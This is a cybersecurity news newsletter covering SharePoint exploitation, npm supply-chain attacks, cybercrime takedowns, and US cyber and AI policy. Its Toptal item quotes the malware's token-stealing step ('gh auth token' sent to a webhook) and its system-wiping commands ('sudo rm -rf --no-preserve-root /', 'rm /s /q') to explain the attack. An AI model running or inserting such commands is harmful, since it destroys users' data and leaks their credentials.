- Vulnerable U
- Posts
- 🎓️ Vulnerable U | #126
🎓️ Vulnerable U | #126
SharePoint!!!! - oh and other things: Massive npm supply chain attack, Trump's AI Action Plan, A few law enforcement wins, and much more!
Matt Johansen
July 25, 2025
Read Time: 9 minutes
Brought to you by:
Howdy friends!
It’s been a no good awful week. Tires got slashed, a bunch of challenges professionally, and then got some really bad news about a good friend’s health.
I have been live streaming a bunch lately on TikTok, IG, Youtube, and Twitch - and my chat is flooded with questions about how to advance your career. “What certs should I get?!” - My advice is constantly the same: I don’t care about certs. If you’re the kind of person that needs to register for a marathon in order to motivate and train to run, go nuts and sign up for a class/test if it gets you to learn. - But at the end of the day it’s all about the people and relationships. Everything around you is people. (soylent green reference here).
Become obsessed with a niche, learn and do all you can within it, and spend the rest of your energy building relationships and meeting people. If you’re hoping the right cert acronym will get your resume through the HR filter, you’re already fighting a losing battle. Go buy someone a coffee or a beer, build trust, stand in front of a pile of proof of your knowledge in whatever form you can think of (blog, videos, github, conference talks, bug bounty rewards, etc.).
Anyway, I’m waxing on about this because the “everything is people” mantra also means people are everything.
Pretty heavy fuckin way to transition into: Lets hang in Vegas! A bunch of you were into a meetup on Thursday. I rented a cabana by the Mandalay Pool.
ICYMI
🖊️ Something I wrote: threat intel report on North Korean threat actors who keep getting hired for remote jobs at US companies.
🎧️ Something I heard: hard to have not watched at least some of this. Hunter Biden interview with channel 5.
🎤 Something I said: biggest security vulnerability of 2025?
🔖 Something I read: My homie Robbie who helped me lose 40lbs and gave me my favorite weight training protocol yet is loving working with cyber nerds. Not a paid promo, just think he’s a great coach who jives with us stressed and busy nerds.
Vulnerable News
This SharePoint vuln is all anyone can talk about all week. I made some content on it when the vuln dropped and my comments and inbox were filled with “yeah but who runs self hosted SharePoint?” since the M365 version isn’t impacted. My response… all the most important targets. Case in point: the US nuclear safety administration.
Microsoft has been great at updating the threat intel report linked here, and a recent update is that Chinese threat actor Storm-2603 is deploying Warlock ransomware. This is a relatively new RaaS that emerged in June with a hilariously brazen forum ad promising Lamborghinis to potential affiliates. While Storm-2603 isn't confirmed as state-backed like their countrymen Linen and Violet Typhoon (who are also exploiting this vuln), they've managed to hit some seriously high-value targets.
Eye Security reports 400+ orgs compromised globally, including several US federal agencies. The National Nuclear Security Administration (yes, the folks managing nuclear weapons) got hit on July 18, along with NIH and DHS. While agencies are downplaying the impact - DoE claims "minimal impact" and no classified data breach - CISA's acting like this is far from over. The US is taking the brunt of these attacks at 13% of global targets, and ESET confirms these aren't random hits but specifically targeted government orgs. (read more)
Join top fraud and cybersecurity leaders to hear how automation is reshaping financial cyber crime and what you can do about it.
🗓️ Thursday, July 31
⏰ 2 PM ET / 11 AM PT
🎙️ Featuring experts:
Allison Miller – Led fraud and cyber teams at Reddit, Google, PayPal, Visa, Bank of America, EA
Kitboga – Scam-baiting improv artist (3.7M+ YouTube subscribers)
Jerry Tylman – Led Fraud Red Teaming for top banks
Brian Silverstein – CEO, MirrorTab; former CTO & Co-founder of Honey (acquired by PayPal)
*Sponsored
After compromising maintainer accounts through spoofed emails, attackers have now hijacked the popular "is" package (2.8M weekly downloads) and embedded a JavaScript malware loader that's fully cross-platform.
Toptal got owned hard and someone used their GitHub org to push out some nasty npm packages. Socket's researchers caught 10 malicious packages from Toptal's Picasso design system that racked up around 5,000 downloads before getting nuked. The attack was pretty brutal - the malicious code would first steal your GitHub auth tokens via gh auth token and send them to a webhook, then try to completely wipe your system with sudo rm -rf --no-preserve-root / on Unix or rm /s /q on Windows.
73 repositories went public within a 5-minute window, suggesting either a compromised account with broad access or some automation. The attackers embedded their payload right in the package.json lifecycle hooks, so just installing these packages would trigger the destruction sequence. Toptal moved fast to deprecate the malicious versions once they caught wind, but this is another reminder that supply chain attacks are getting nastier and more destructive. (read more)
Big takedown in Kyiv - Europol nabbed the admin of XSS[.]is (formerly DaMaGeLaB), one of the major Russian-speaking cybercrime forums. The admin, who's been in the game for nearly 20 years, also operated thesecure[.]biz, a private messaging platform for criminals, pulling in about €7M from these ventures. XSS[.]is itself had 50k users and was basically a one-stop shop for stolen data, hacking tools, and an escrow service for criminal transactions.
This arrest ties into a broader crackdown on pro-Russian cyber operations. Just last week, Europol disrupted NoName057(16)'s infrastructure and arrested two people running DDoS attacks against Ukraine and allies. (read more)
Trump's CISA nominee Sean Plankey had his confirmation hearing this week and it went pretty smoothly. The guy's got solid cyber credentials - former Coast Guard cyber leader, worked at DOE and the NSC during Trump's first term. He pledged to ask DHS Secretary Kristi Noem for more funding if CISA needs it, and he's backing the reauthorization of that 2015 cybersecurity info-sharing law that's set to expire in September.
The hearing had the expected political theater - Republicans grilled him about Biden-era "censorship" (which he promised to dial back), while Democrats tried to pin him down on 2020 election integrity. Plankey basically said "I'm a cyber guy, not an election auditor" and deflected. His nomination was already delayed once over security clearance paperwork, and now Sen. Wyden's got a hold on it because CISA won't release some unclassified telecom security report. Still, the cybersecurity community seems to like the pick, so he'll probably get through eventually. (read more)
Trump dropped his AI Action Plan this week, and it's basically Big Tech's Christmas wish list wrapped in "beat China" rhetoric. The 90+ policy recommendations boil down to gutting regulations, letting Silicon Valley run wild, and making sure AI stays ideologically "pure" (whatever that means). They're pushing to reverse Biden-era AI oversight, threaten to pull federal funding from states with AI regulations, and only give government contracts to AI companies that promise to be "objective and free from bias."
The plan's three pillars sound reasonable enough - innovation, infrastructure, and international leadership - but the execution is pure deregulation fever dream. They're literally telling agencies to back off investigations that might "burden AI innovation" and want to build energy infrastructure by rejecting "radical climate dogma." Critics are already calling it out as Big Tech capturing policy, which... yeah, when your AI czar is David Sacks and you're announcing $100 billion joint ventures with OpenAI, that's not exactly subtle. The cybersecurity implications of rushing AI deployment without proper oversight should be fun to watch unfold. (read more)
Researchers just dropped some intel on a nasty new loader called CastleLoader that's been making rounds since earlier this year. They're using fake GitHub repos that mimic legit tools and those annoying ClickFix phishing attacks where they trick you into running PowerShell commands. (read more)
This is a fun one by the folks at Trustwave. Who knew about these Dark Web travel agencies? These aren't just sketchy booking sites - they're full-service criminal operations offering everything from luxury Dubai hotels to budget European hostels, all powered by stolen credit cards and compromised loyalty accounts. The whole thing runs through Telegram channels where you message directly with operators who manually book your trip using someone else's stolen data. They're making it look legit with customer reviews and "rebooking guarantees" while charging 30-70% below market rates.
When platforms like Rentalcars[.]com shut them down, they just disappear for a few months then pop back up with new workarounds. The travel industry is responding - airlines and airports are dumping record amounts into cybersecurity, with 66% of airlines calling it their top priority. But it's classic whack-a-mole territory. These agencies democratized fraud across all price points, so it's not just luxury brands getting hit anymore - every hotel chain and booking platform is fair game. (read more)
The DOJ and FBI took down four major dark web CSAM sites and landed 18 convictions totaling over 300 years in prison. The latest sentencing was Thomas Peter Katsampes from Minnesota, who got hit with 250 months (over 20 years) plus lifetime supervised release for working his way up to a staff position on one of these sites. These weren't small-time operations - some of the most heinous sites on the dark web with dedicated sections for infants and detailed guides on avoiding law enforcement.
The operation went international, with arrests spanning the UK, Netherlands, Italy, Germany, and several other countries. What's really grim is how organized these sites were - they had staff meetings, promotion systems, and user management just like any other business. The sentences have been appropriately heavy, with one defendant getting life in prison and others receiving decades behind bars. (read more)
Hey! Security isn’t a “nice to have” situation!
A single weak password just killed off a 158-year-old company and put 700 people out of work. KNP, a Northamptonshire transport firm, got hit by the Akira ransomware gang who managed to guess an employee's password and then encrypted everything. The hackers wanted up to £5m to unlock the data - money the company simply didn't have. So that was it, game over for a business that had survived since the 1860s.
I mean sure, a weak password is bad, but really it’s also the complete lack of any security infrastructure beyond that. 2fa? backups? any sort of business continuity plan?
The director of KNP hasn't even told the employee whose password got cracked that they're probably responsible for destroying the company. "Would you want to know if it was you?" he asks. Fair point, honestly. (read more)
Miscellaneous mattjay
How'd I do this edition?It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week. |
Parting Thoughts:
Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.
Stay safe, Matt Johansen
@mattjay